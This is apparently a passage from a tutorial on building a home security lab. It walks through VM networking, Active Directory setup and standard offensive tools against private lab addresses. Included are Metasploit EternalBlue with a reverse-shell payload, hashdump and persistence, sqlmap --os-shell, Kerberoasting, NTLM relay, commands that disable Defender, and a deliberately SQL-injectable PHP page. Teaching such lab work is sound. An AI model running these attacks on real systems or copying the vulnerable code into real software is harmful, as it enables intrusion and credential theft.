# Attached to: Host-only Adapter
# Name: vboxnet0
VMware Host-Only:
# VMware creates host-only by default (VMnet1)
# Edit → Virtual Network Editor
# VMnet1 (Host-only)
# Subnet: 192.168.137.0/24
# Attach VM:
# VM Settings → Network Adapter → Host-only
Static IP Configuration:
# Ubuntu/Debian
sudo nano /etc/netplan/00-installer-config.yaml
network:
version: 2
ethernets:
enp0s8:
addresses:
- 192.168.56.20/24
sudo netplan apply
# CentOS/RHEL
sudo nmcli con mod enp0s8 ipv4.addresses 192.168.56.20/24
sudo nmcli con mod enp0s8 ipv4.method manual
sudo nmcli con up enp0s8
# Windows
New-NetIPAddress -InterfaceAlias "Ethernet 2" -IPAddress 192.168.56.30 -PrefixLength 24
Host-only networks are your lab backbone
Bridged Networking¶
Bridged makes VM appear on physical network
When to Use Bridged:
- Need to access lab from other devices
- Testing network services on real network
- Simulating real network scenarios
When NOT to Use Bridged:
- Running vulnerability scans (don't scan your home/work network)
- Testing exploits (don't attack real devices)
- Malware analysis (don't infect real network)
VirtualBox Bridged:
# VM Settings → Network → Adapter 1
# Attached to: Bridged Adapter
# Name: (select your physical network interface)
# VM will get IP from physical network DHCP
Security Warning:
Bridged mode exposes your lab VMs to the physical network
If you're running intentionally vulnerable systems on bridged mode on a corporate network , you're asking to get fired
Use host-only for lab work
Internal Networks¶
Internal networks are completely isolated
VirtualBox Internal:
# VM Settings → Network → Adapter 1
# Attached to: Internal Network
# Name: intnet (or any name)
# All VMs on same "intnet" can communicate
# No host access , no internet , completely isolated
Use Cases:
- Malware analysis (can't phone home)
- Air-gapped AD environment
- Simulating isolated networks
- Testing without internet
Setting Up Internal Network:
# Create multiple VMs on same internal network
# VM1: intnet
# VM2: intnet
# VM3: intnet
# Configure static IPs (no DHCP on internal networks)
# VM1: 10.10.10.10/24
# VM2: 10.10.10.20/24
# VM3: 10.10.10.30/24
# VMs can ping each other
# VMs can't reach internet
# Host can't reach VMs
Perfect for malware analysis and isolated scenarios
Network Segmentation¶
Advanced labs use multiple network segments
Example Lab Network Design:
Internet
|
[NAT Network] - Kali (10.0.2.15)
|
[Host-Only 1] - DMZ Network (192.168.56.0/24)
|-- Web Server (192.168.56.20)
|-- Database Server (192.168.56.21)
|
[Host-Only 2] - Internal Network (192.168.57.0/24)
|-- Domain Controller (192.168.57.10)
|-- Workstation 1 (192.168.57.20)
|-- Workstation 2 (192.168.57.21)
|
[Internal] - Isolated Malware Lab (10.10.10.0/24)
|-- Analysis VM (10.10.10.10)
|-- Malware Sandbox (10.10.10.20)
Why Segment:
- Simulate real network architecture
- Practice network pivoting
- Isolate different scenarios
- Control traffic flow
Implementing Segmentation:
# Create multiple host-only networks
VBoxManage hostonlyif create # vboxnet0
VBoxManage hostonlyif create # vboxnet1
VBoxManage hostonlyif ipconfig vboxnet0 --ip 192.168.56.1
VBoxManage hostonlyif ipconfig vboxnet1 --ip 192.168.57.1
# Assign VMs to appropriate networks
# Kali: NAT + vboxnet0 + vboxnet1 (access to all segments)
# DMZ servers: vboxnet0 only
# Internal servers: vboxnet1 only
Segmentation makes your lab realistic
VLAN Configuration¶
VLANs add another layer of network isolation
Why VLANs in Lab:
- Simulate enterprise networks
- Practice VLAN hopping attacks
- Understand network segmentation
- Learn switch configuration
Setting Up VLANs:
Requires virtual switch/router (pfSense , VyOS , or physical switch)
# Example with Linux bridge and VLANs
sudo apt install -y vlan bridge-utils
# Load 8021q module
sudo modprobe 8021q
# Create VLAN interfaces
sudo vconfig add eth0 10 # VLAN 10
sudo vconfig add eth0 20 # VLAN 20
# Assign IPs
sudo ifconfig eth0.10 192.168.10.1 netmask 255.255.255.0
sudo ifconfig eth0.20 192.168.20.1 netmask 255.255.255.0
VLANs are advanced , not necessary for basic labs
pfSense Firewall Setup¶
pfSense adds realistic firewall/routing to your lab
Why pfSense:
- Free and open source
- Full-featured firewall
- VPN server
- Traffic shaping
- IDS/IPS (with Suricata/Snort)
- Simulates enterprise edge device
Downloading pfSense:
# Get latest from pfsense.org
https://github.com/pfsense/pfsense
Installation:
# Create VM:
# - RAM: 1GB minimum (2GB better)
# - Storage: 8GB
# - Network: 2 adapters
# - Adapter 1: NAT (WAN)
# - Adapter 2: Host-only (LAN)
# Install:
# Accept defaults
# Reboot after install
Initial Configuration:
# Console menu appears
# 1) Assign Interfaces
# WAN: em0 (NAT adapter)
# LAN: em1 (Host-only adapter)
# 2) Set interface IP addresses
# LAN: 192.168.56.1/24
# Access web GUI from Kali:
# http://192.168.56.1
# Username: admin
# Password: pfsense
pfSense Use Cases:
- Firewall rule testing
- VPN configuration practice
- IDS/IPS testing
- Traffic analysis
- Network segmentation
pfSense makes your lab enterprise-grade
Information Gathering Tools¶
These are your reconnaissance tools , you'll use them constantly
nmap - Network Scanner
Already covered basics earlier , here's advanced usage
# Full TCP scan with scripts
sudo nmap -sS -sV -sC -p- -T4 --script vuln 192.168.56.0/24 -oA full-scan
# UDP scan (slower but finds different services)
sudo nmap -sU --top-ports 100 192.168.56.20
# Aggressive scan (OS detection + version + scripts + traceroute)
sudo nmap -A 192.168.56.20
# Scan through proxychains
proxychains nmap -sT -Pn 192.168.56.20
masscan - Fast Port Scanner
# Scan entire subnet for port 80
masscan 192.168.56.0/24 -p80 --rate=1000
# Scan multiple ports
masscan 192.168.56.0/24 -p21,22,80,443,3389 --rate=10000
# Output to file
masscan 192.168.56.0/24 -p1-65535 --rate=100000 -oL masscan-results.txt
enum4linux - SMB Enumeration
# Full enumeration
enum4linux -a 192.168.56.30
# User enumeration
enum4linux -U 192.168.56.30
# Share enumeration
enum4linux -S 192.168.56.30
Nmap Mastery¶
nmap deserves its own deep dive
NSE Scripts Categories:
# List all scripts
ls /usr/share/nmap/scripts/
# Search for specific scripts
nmap --script-help "*smb*"
# Run script categories
nmap --script auth 192.168.56.20 # Authentication
nmap --script broadcast 192.168.56.20 # Broadcast discovery
nmap --script brute 192.168.56.20 # Brute force
nmap --script default 192.168.56.20 # Default safe scripts
nmap --script discovery 192.168.56.20 # Service discovery
nmap --script dos 192.168.56.20 # DoS attacks (careful!)
nmap --script exploit 192.168.56.20 # Exploitation
nmap --script fuzzer 192.168.56.20 # Fuzzing
nmap --script intrusive 192.168.56.20 # Intrusive tests
nmap --script malware 192.168.56.20 # Malware detection
nmap --script safe 192.168.56.20 # Safe scripts
nmap --script version 192.168.56.20 # Version detection
nmap --script vuln 192.168.56.20 # Vulnerability detection
Useful Specific Scripts:
# SMB vulnerabilities
nmap --script smb-vuln* 192.168.56.30
# HTTP enumeration
nmap --script http-enum 192.168.56.20
# SSL/TLS testing
nmap --script ssl-enum-ciphers -p 443 192.168.56.20
# DNS zone transfer
nmap --script dns-zone-transfer --script-args dns-zone-transfer.domain=lab.local 192.168.56.10
# SSH brute force
nmap --script ssh-brute --script-args userdb=users.txt,passdb=passwords.txt 192.168.56.20
Output Formats:
# Normal output (human readable)
nmap -oN scan.txt 192.168.56.20
# XML output (for tools)
nmap -oX scan.xml 192.168.56.20
# Grepable output (for parsing)
nmap -oG scan.gnmap 192.168.56.20
# All formats
nmap -oA scan 192.168.56.20
Master nmap , it's your most important tool
Metasploit Framework¶
The exploitation framework everyone talks about
Starting Metasploit:
# Initialize database (first time)
sudo msfdb init
# Start console
msfconsole
# Check database connection
msf6 > db_status
# Workspace management
msf6 > workspace -a lab
msf6 > workspace lab
Basic Workflow:
# 1. Search for exploit
msf6 > search ms17-010
# 2. Use exploit
msf6 > use exploit/windows/smb/ms17_010_eternalblue
# 3. Show options
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
# 4. Set required options
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.56.30
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.56.10
# 5. Select payload
msf6 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
# 6. Run exploit
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
Meterpreter Basics:
# System info
meterpreter > sysinfo
meterpreter > getuid
# File system
meterpreter > pwd
meterpreter > ls
meterpreter > cd C:\\Users
meterpreter > download file.txt
meterpreter > upload payload.exe
# Process management
meterpreter > ps
meterpreter > migrate 1234
# Privilege escalation
meterpreter > getsystem
# Credential dumping
meterpreter > hashdump
meterpreter > load kiwi
meterpreter > creds_all
# Persistence
meterpreter > run persistence -X -i 60 -p 4444 -r 192.168.56.10
# Pivoting
meterpreter > run autoroute -s 10.10.10.0/24
meterpreter > portfwd add -l 3389 -p 3389 -r 10.10.10.20
Auxiliary Modules:
# Port scanning
msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 192.168.56.0/24
msf6 auxiliary(scanner/portscan/tcp) > run
# SMB version detection
msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.56.0/24
msf6 auxiliary(scanner/smb/smb_version) > run
# HTTP directory scanner
msf6 > use auxiliary/scanner/http/dir_scanner
msf6 auxiliary(scanner/http/dir_scanner) > set RHOSTS 192.168.56.20
msf6 auxiliary(scanner/http/dir_scanner) > run
Metasploit is powerful but don't rely on it exclusively , understand what exploits actually do
Burp Suite Configuration¶
Web app testing requires Burp Suite
Installation:
# Community Edition (free)
sudo apt install burpsuite
# Or download from portswigger.net
# Professional (paid , $449/year)
# Download from portswigger.net
# Requires license key
Initial Setup:
# Launch Burp
burpsuite
# Proxy settings:
# Proxy → Options
# Binding: 127.0.0.1:8080
# Intercept: On
# Browser proxy configuration:
# Firefox → Settings → Network Settings
# Manual proxy: 127.0.0.1:8080
# Use for all protocols
# Or use FoxyProxy extension for easy switching
SSL Certificate:
# Export Burp CA certificate
# Proxy → Options → Import/Export CA Certificate
# Export → Certificate in DER format
# Save as burp-cert.der
# Import to Firefox
# Settings → Privacy & Security → Certificates → View Certificates
# Authorities → Import → burp-cert.der
# Trust for websites
Essential Burp Features:
Proxy: - Intercept and modify requests/responses - Match and replace rules - Response modification
Repeater: - Manually test requests - Modify parameters - Test different payloads
Intruder: - Automated attacks - Fuzzing parameters - Brute forcing - Payload positions
Scanner (Pro only): - Automated vulnerability scanning - Active and passive scanning - Custom scan configurations
Sequencer: - Test session token randomness - Analyze entropy
Decoder: - Encode/decode data - URL , Base64 , HTML , etc
Comparer: - Compare requests/responses - Find differences
Burp Extensions:
# Install from BApp Store:
# Extender → BApp Store
# Useful extensions:
# - Autorize (authorization testing)
# - Logger++ (better logging)
# - Turbo Intruder (fast fuzzing)
# - JWT Editor (JWT manipulation)
# - Active Scan++ (additional checks)
Burp is essential for web app testing , learn it thoroughly
Wireshark Packet Analysis¶
Network traffic analysis tool
Installation:
# Already on Kali
wireshark
# Or install
sudo apt install wireshark
# Add user to wireshark group
sudo usermod -aG wireshark $USER
Capture Filters:
# Capture only HTTP
tcp port 80
# Capture specific host
host 192.168.56.20
# Capture subnet
net 192.168.56.0/24
# Capture specific protocol
tcp or udp or icmp
Display Filters:
# HTTP traffic
http
# Specific IP
ip.addr == 192.168.56.20
# TCP port
tcp.port == 445
# Follow TCP stream
Right-click packet → Follow → TCP Stream
# Find passwords
http.request.method == "POST"
Useful Wireshark Features:
- Statistics → Protocol Hierarchy
- Statistics → Conversations
- Statistics → Endpoints
- Export Objects → HTTP (extract files)
Wireshark shows you what's actually happening on the network
Hashcat Password Cracking¶
GPU-accelerated password cracking
Installation:
# Already on Kali
hashcat
# Or install
sudo apt install hashcat hashcat-data
Basic Usage:
# Crack MD5 hash
hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
# Crack NTLM hash
hashcat -m 1000 -a 0 ntlm.txt /usr/share/wordlists/rockyou.txt
# Crack with rules
hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
# Brute force
hashcat -m 0 -a 3 hash.txt ?a?a?a?a?a?a
# Show cracked passwords
hashcat -m 0 hash.txt --show
Hash Types:
# Common hash modes:
# 0 = MD5
# 100 = SHA1
# 1000 = NTLM
# 1400 = SHA256
# 1800 = sha512crypt
# 3200 = bcrypt
# 5600 = NetNTLMv2
# 13100 = Kerberos TGS-REP
# 18200 = Kerberos AS-REP
# List all modes
hashcat --help | grep -i "hash modes"
Mask Attacks:
# Character sets:
# ?l = lowercase (a-z)
# ?u = uppercase (A-Z)
# ?d = digits (0-9)
# ?s = special characters
# ?a = all characters
# Examples:
hashcat -m 0 -a 3 hash.txt ?u?l?l?l?l?l?d?d # Password01
hashcat -m 0 -a 3 hash.txt ?d?d?d?d?d?d?d?d # 8 digits
hashcat -m 0 -a 3 hash.txt ?a?a?a?a?a?a # 6 any chars
Hashcat is fast , use GPU if available
John the Ripper¶
CPU-based password cracking
Basic Usage:
# Crack with wordlist
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
# Crack with rules
john --wordlist=/usr/share/wordlists/rockyou.txt --rules hash.txt
# Show cracked passwords
john --show hash.txt
# Incremental mode (brute force)
john --incremental hash.txt
Hash Extraction:
# Linux shadow file
sudo unshadow /etc/passwd /etc/shadow > hashes.txt
john hashes.txt
# Windows SAM
# (extract with secretsdump.py or similar)
john ntlm.txt --format=NT
# ZIP file
zip2john file.zip > zip.hash
john zip.hash
# SSH key
ssh2john id_rsa > ssh.hash
john ssh.hash
John is slower than Hashcat but more versatile
SQLMap for Injection¶
Automated SQL injection tool
Basic Usage:
# Test URL for SQLi
sqlmap -u "http://192.168.56.20/page.php?id=1"
# POST request
sqlmap -u "http://192.168.56.20/login.php" --data="username=admin&password=test"
# From Burp request
sqlmap -r request.txt
# Specify parameter
sqlmap -u "http://192.168.56.20/page.php?id=1&name=test" -p id
Database Enumeration:
# List databases
sqlmap -u "http://192.168.56.20/page.php?id=1" --dbs
# List tables
sqlmap -u "http://192.168.56.20/page.php?id=1" -D database_name --tables
# Dump table
sqlmap -u "http://192.168.56.20/page.php?id=1" -D database_name -T users --dump
# Dump all
sqlmap -u "http://192.168.56.20/page.php?id=1" --dump-all
Advanced Options:
# Specify DBMS
sqlmap -u "http://192.168.56.20/page.php?id=1" --dbms=mysql
# Risk and level
sqlmap -u "http://192.168.56.20/page.php?id=1" --level=5 --risk=3
# Tamper scripts (WAF bypass)
sqlmap -u "http://192.168.56.20/page.php?id=1" --tamper=space2comment
# OS shell
sqlmap -u "http://192.168.56.20/page.php?id=1" --os-shell
SQLMap automates SQLi but understand manual injection first
Gobuster Directory Enumeration¶
Fast directory and file brute forcing
Installation:
# Already on Kali
gobuster
# Or install
sudo apt install gobuster
Directory Brute Force:
# Basic scan
gobuster dir -u http://192.168.56.20 -w /usr/share/wordlists/dirb/common.txt
# With extensions
gobuster dir -u http://192.168.56.20 -w /usr/share/wordlists/dirb/common.txt -x php,html,txt
# Ignore status codes
gobuster dir -u http://192.168.56.20 -w /usr/share/wordlists/dirb/common.txt -b 403,404
# With authentication
gobuster dir -u http://192.168.56.20 -w /usr/share/wordlists/dirb/common.txt -U username -P password
# Follow redirects
gobuster dir -u http://192.168.56.20 -w /usr/share/wordlists/dirb/common.txt -r
DNS Subdomain Enumeration:
# Subdomain brute force
gobuster dns -d example.com -w /usr/share/wordlists/subdomains.txt
VHost Enumeration:
# Virtual host discovery
gobuster vhost -u http://192.168.56.20 -w /usr/share/wordlists/subdomains.txt
Gobuster is fast , use good wordlists
Nikto Web Scanner¶
Already covered basics , here's advanced usage
# Full scan with all plugins
nikto -h http://192.168.56.20 -Plugins @@ALL
# Scan with specific plugins
nikto -h http://192.168.56.20 -Plugins headers,cookies
# Scan through proxy
nikto -h http://192.168.56.20 -useproxy http://127.0.0.1:8080
# Scan with authentication
nikto -h http://192.168.56.20 -id username:password
# Multiple hosts
nikto -h hosts.txt
# Output formats
nikto -h http://192.168.56.20 -Format htm -output report.html
Building AD Environment¶
Active Directory lab is essential for enterprise security testing
Architecture:
Domain: lab.local
Domain Controller: DC01 (192.168.100.10)
Workstation 1: WS01 (192.168.100.20)
Workstation 2: WS02 (192.168.100.21)
Server: SRV01 (192.168.100.30)
Network Setup:
# Create internal network for AD
# All AD VMs on same internal network: "ADLab"
# Configure static IPs
# DNS points to DC (192.168.100.10)
Domain Controller Setup:
Already covered basic DC setup earlier , here's full configuration
# After promoting to DC , configure DNS
Add-DnsServerPrimaryZone -Name "lab.local" -ReplicationScope "Forest"
# Create reverse lookup zone
Add-DnsServerPrimaryZone -NetworkID "192.168.100.0/24" -ReplicationScope "Forest"
# Verify DNS
nslookup lab.local
nslookup dc01.lab.local
Domain Controller Setup¶
Complete DC configuration
Creating Organizational Units:
# Create OUs
New-ADOrganizationalUnit -Name "Workstations" -Path "DC=lab,DC=local"
New-ADOrganizationalUnit -Name "Servers" -Path "DC=lab,DC=local"
New-ADOrganizationalUnit -Name "Users" -Path "DC=lab,DC=local"
New-ADOrganizationalUnit -Name "Groups" -Path "DC=lab,DC=local"
New-ADOrganizationalUnit -Name "Service Accounts" -Path "DC=lab,DC=local"
Adding Domain Users¶
Populate AD with users
# Create users
New-ADUser -Name "John Doe" -GivenName "John" -Surname "Doe" -SamAccountName "jdoe" -UserPrincipalName "jdoe@lab.local" -Path "OU=Users,DC=lab,DC=local" -AccountPassword (ConvertTo-SecureString "Password123!" -AsPlainText -Force) -Enabled $true
New-ADUser -Name "Jane Smith" -GivenName "Jane" -Surname "Smith" -SamAccountName "jsmith" -UserPrincipalName "jsmith@lab.local" -Path "OU=Users,DC=lab,DC=local" -AccountPassword (ConvertTo-SecureString "Password123!" -AsPlainText -Force) -Enabled $true
# Create admin user
New-ADUser -Name "Admin User" -GivenName "Admin" -Surname "User" -SamAccountName "admin" -UserPrincipalName "admin@lab.local" -Path "OU=Users,DC=lab,DC=local" -AccountPassword (ConvertTo-SecureString "P@ssw0rd123!" -AsPlainText -Force) -Enabled $true
Add-ADGroupMember -Identity "Domain Admins" -Members admin
# Create service account (for Kerberoasting)
New-ADUser -Name "SQL Service" -SamAccountName "sqlsvc" -UserPrincipalName "sqlsvc@lab.local" -Path "OU=Service Accounts,DC=lab,DC=local" -AccountPassword (ConvertTo-SecureString "MyV0iceIsMyP@ssw0rd" -AsPlainText -Force) -Enabled $true
# Set SPN (makes it Kerberoastable)
setspn -a MSSQLSvc/srv01.lab.local:1433 lab\sqlsvc
# Create groups
New-ADGroup -Name "IT Department" -GroupScope Global -Path "OU=Groups,DC=lab,DC=local"
New-ADGroup -Name "HR Department" -GroupScope Global -Path "OU=Groups,DC=lab,DC=local"
# Add users to groups
Add-ADGroupMember -Identity "IT Department" -Members jdoe
Add-ADGroupMember -Identity "HR Department" -Members jsmith
Group Policy Configuration¶
GPO for testing
# Disable Windows Defender via GPO
New-GPO -Name "Disable Defender" | New-GPLink -Target "DC=lab,DC=local"
Set-GPRegistryValue -Name "Disable Defender" -Key "HKLM\Software\Policies\Microsoft\Windows Defender" -ValueName "DisableAntiSpyware" -Type DWord -Value 1
# Disable firewall via GPO
New-GPO -Name "Disable Firewall" | New-GPLink -Target "DC=lab,DC=local"
Set-GPRegistryValue -Name "Disable Firewall" -Key "HKLM\Software\Policies\Microsoft\WindowsFirewall\DomainProfile" -ValueName "EnableFirewall" -Type DWord -Value 0
# Force GPO update
gpupdate /force
Kerberos Attack Lab¶
Configure for Kerberoasting and AS-REP roasting
Kerberoasting Setup:
Already created sqlsvc with SPN above
AS-REP Roasting Setup:
# Create user without Kerberos pre-auth
New-ADUser -Name "No PreAuth User" -SamAccountName "nopreauth" -UserPrincipalName "nopreauth@lab.local" -Path "OU=Users,DC=lab,DC=local" -AccountPassword (ConvertTo-SecureString "Password123!" -AsPlainText -Force) -Enabled $true
# Disable Kerberos pre-authentication
Set-ADAccountControl -Identity nopreauth -DoesNotRequirePreAuth $true
Testing from Kali:
# Kerberoasting
impacket-GetUserSPNs lab.local/jdoe:Password123! -dc-ip 192.168.100.10 -request
# AS-REP Roasting
impacket-GetNPUsers lab.local/nopreauth -dc-ip 192.168.100.10 -no-pass
# Crack with Hashcat
hashcat -m 13100 kerberoast.hash /usr/share/wordlists/rockyou.txt
hashcat -m 18200 asreproast.hash /usr/share/wordlists/rockyou.txt
NTLM Relay Setup¶
Configure for relay attacks
Disable SMB Signing:
# On workstations (makes them vulnerable to relay)
Set-SmbClientConfiguration -RequireSecuritySignature $false -Force
Set-SmbServerConfiguration -RequireSecuritySignature $false -Force
Testing NTLM Relay:
# On Kali , start responder
sudo responder -I eth0 -wrf
# Start ntlmrelayx
impacket-ntlmrelayx -tf targets.txt -smb2support
# Trigger authentication from Windows
# User browses to \\kali-ip\share
BloodHound Installation¶
AD attack path visualization
Neo4j Setup:
# Install Neo4j
sudo apt install neo4j bloodhound
# Start Neo4j
sudo neo4j console
# Access: http://localhost:7474
# Default creds: neo4j/neo4j
# Change password on first login
BloodHound Setup:
# Start BloodHound
bloodhound
# Connect to Neo4j
# URL: bolt://localhost:7687
# Username: neo4j
# Password: (your new password)
Data Collection:
# From Kali
bloodhound-python -u jdoe -p Password123! -d lab.local -dc dc01.lab.local -ns 192.168.100.10 -c all
# Or from Windows (SharpHound)
# Download SharpHound.exe to Windows
.\SharpHound.exe -c all
# Import JSON files into BloodHound
# Upload → Select JSON files
BloodHound shows you AD attack paths visually
DVWA Installation¶
Damn Vulnerable Web Application
# On Ubuntu target
cd /var/www/html
sudo git clone https://github.com/digininja/DVWA.git
cd DVWA
sudo cp config/config.inc.php.dist config/config.inc.php
# Edit config
sudo nano config/config.inc.php
# Set database credentials
# Create database
mysql -u root -p
CREATE DATABASE dvwa;
CREATE USER 'dvwa'@'localhost' IDENTIFIED BY 'password';
GRANT ALL PRIVILEGES ON dvwa.* TO 'dvwa'@'localhost';
FLUSH PRIVILEGES;
EXIT;
# Set permissions
sudo chmod 777 /var/www/html/DVWA/hackable/uploads/
sudo chmod 777 /var/www/html/DVWA/external/phpids/0.6/lib/IDS/tmp/phpids_log.txt
sudo chmod 777 /var/www/html/DVWA/config
# Access: http://192.168.56.20/DVWA
# Click "Create / Reset Database"
# Login: admin/password
WebGoat Setup¶
OWASP WebGoat
# Download
https://hub.docker.com/r/webgoat/webgoat
# Run
docker run -p 127.0.0.1:8080:8080 -p 127.0.0.1:9090:9090 -e TZ=Europe/Amsterdam webgoat/webgoat
# Access: http://localhost:8080/WebGoat
# Register new user
OWASP Juice Shop¶
Modern vulnerable web app
# Using Docker
https://hub.docker.com/r/bkimminich/juice-shop
docker pull bkimminich/juice-shop
docker run --rm -p 3000:3000 bkimminich/juice-shop
# Docker , that's my go-to for tools , it just keeps everything clean , no system mess , no conflicts , pure stability , you get it
# Access: http://localhost:3000
Custom Vulnerable Apps¶
Build your own
# Simple SQLi vulnerable page
<?php
$conn = mysqli_connect("localhost", "root", "password", "testdb");
$id = $_GET['id'];
$query = "SELECT * FROM users WHERE id = $id"; // Vulnerable!
''$result = mysqli_query($conn, $query);
while($row = mysqli_fetch_assoc($result)) {
echo $row['username'] . "<br>";
}
?>
SSL Certificate Setup¶
HTTPS for web apps
# Generate self-signed certificate
sudo openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /etc/ssl/private/apache-selfsigned.key -out /etc/ssl/certs/apache-selfsigned.crt
# Configure Apache
sudo nano /etc/apache2/sites-available/default-ssl.conf
# Update paths to certificate and key
# Enable SSL
sudo a2enmod ssl
sudo a2ensite default-ssl
sudo systemctl restart apache2
Isolated Analysis Environment¶
Malware analysis requires complete isolation
Network Setup:
# Internal network only
# No internet access
# No host access
# VMs can only talk to each other
Required VMs:
- Analysis workstation (Windows with tools)
- Malware execution VM (Windows , disposable)
- Fake services VM (INetSim)
REMnux Setup¶
Linux for malware analysis
# Download
wget https://remnux.org/remnux-cli
# Install
sudo ./remnux-cli install
# Or use pre-built VM
# Download from remnux.org
Flare VM Configuration¶
Windows malware analysis VM
# Download install script
Invoke-WebRequest https://raw.githubusercontent.com/mandiant/flare-vm/main/install.ps1 -OutFile install.ps1
# Unblock
Unblock-File .\install.ps1
# Install (takes hours)
.\install.ps1
# Reboot multiple times during install
Cuckoo Sandbox¶
Automated malware analysis
# Install dependencies
sudo apt install python3 python3-pip python3-dev libffi-dev libssl-dev
sudo apt install postgresql libpq-dev
sudo apt install mongodb
sudo apt install tcpdump
# Install Cuckoo
pip3 install -U cuckoo
# Initialize
cuckoo init
# Configure
cuckoo community
# Start
cuckoo -d
INetSim Fake Services¶
Simulate internet services
# Install
sudo apt install inetsim
# Configure
sudo nano /etc/inetsim/inetsim.conf
# Set service_bind_address to VM IP
# Start
sudo inetsim
# Provides fake:
# - HTTP/HTTPS
# - DNS
# - SMTP
# - FTP
# - IRC
# - etc
Snapshot Strategy¶
Snapshots are critical for lab management
When to Snapshot:
# 1. Fresh install (clean slate)
# 2. After initial configuration
# 3. Before installing vulnerable software
# 4. Before each testing session
# 5. After significant changes
Naming Convention:
# Use descriptive names with dates
# Examples:
# - "Fresh Install - 2024-01-15"
# - "Defender Disabled - 2024-01-15"
# - "DVWA Installed - 2024-01-15"
# - "Pre-Exploitation - 2024-01-15"
Snapshot Management:
# VirtualBox
VBoxManage snapshot "VM-Name" take "Snapshot-Name"
VBoxManage snapshot "VM-Name" restore "Snapshot-Name"
VBoxManage snapshot "VM-Name" delete "Snapshot-Name"
# List snapshots
VBoxManage snapshot "VM-Name" list
Resource Optimization¶
Make your lab run smoothly
RAM Allocation:
# Don't allocate more than 50-75% of physical RAM
# Leave enough for host OS
# Example with 16GB RAM:
# - Host: 4GB
# - Kali: 4GB
# - Windows DC: 4GB
# - Windows WS: 2GB
# - Linux target: 2GB
CPU Allocation:
# Don't allocate more than 50% of physical cores
# Example with 8 cores:
# - Kali: 2 cores
# - Windows DC: 2 cores
# - Windows WS: 1 core
# - Linux target: 1 core
Storage Optimization:
# Use dynamically allocated disks
# Compact VDI files periodically
VBoxManage modifymedium disk "VM.vdi" --compact
# Delete old snapshots
# Store ISOs on separate drive
Documentation Practices¶
Document everything
What to Document:
- Network topology
- IP addresses
- Credentials
- Installed software
- Vulnerabilities configured
- Attack paths tested
- Lessons learned
Tools:
- CherryTree (note taking)
- Obsidian (markdown notes)
- OneNote (Microsoft)
- Simple text files
Backup and Recovery¶
Protect your lab investment
# Export VMs
VBoxManage export "VM-Name" -o VM-Name.ova
# Import VMs
VBoxManage import VM-Name.ova
# Backup VM folder
tar -czf lab-backup.tar.gz ~/VirtualBox\ VMs/
# Store backups on external drive
Common VM Issues¶
Troubleshooting guide
VM Won't Start:
# Check virtualization enabled in BIOS
# Check VT-x/AMD-V enabled
# Check no other hypervisor running
# Check disk space available
# Check VM configuration valid
Network Problems:
# Check adapter enabled
# Check correct network mode
# Restart network service
sudo systemctl restart NetworkManager
# Check IP configuration
ip addr show
# Check routing
ip route show
# Test connectivity
ping 192.168.56.1
Performance Tuning:
# Allocate more RAM
# Allocate more CPU cores
# Use SSD storage
# Enable VT-x/AMD-V
# Disable unnecessary services
# Close other applications
Storage Management:
# Check disk usage
df -h
# Clean package cache
sudo apt clean
# Remove old kernels
sudo apt autoremove
# Compact disk
VBoxManage modifymedium disk "VM.vdi" --compact
Final Thoughts¶
You now have everything you need to build a comprehensive security lab
What You've Learned:
- Why labs are non-negotiable
- Legal considerations
- Hardware requirements
- Hypervisor selection
- OS installation and configuration
- Network design and segmentation
- Essential tools
- Active Directory environments
- Web application testing
- Malware analysis
- Lab management
- Troubleshooting
Next Steps:
- Start with basic setup (Kali + 1-2 targets)
- Practice fundamental attacks
- Expand gradually
- Document everything
- Break things , fix things , learn
Remember:
- Labs are for learning , not showing off
- Understand tools , don't just run them
- Document your work
- Practice legally and ethically
- Build skills through repetition
- Help others learn
Now stop reading and start building , your lab won't create itself
The best time to start was yesterday , the second best time is now
Get to work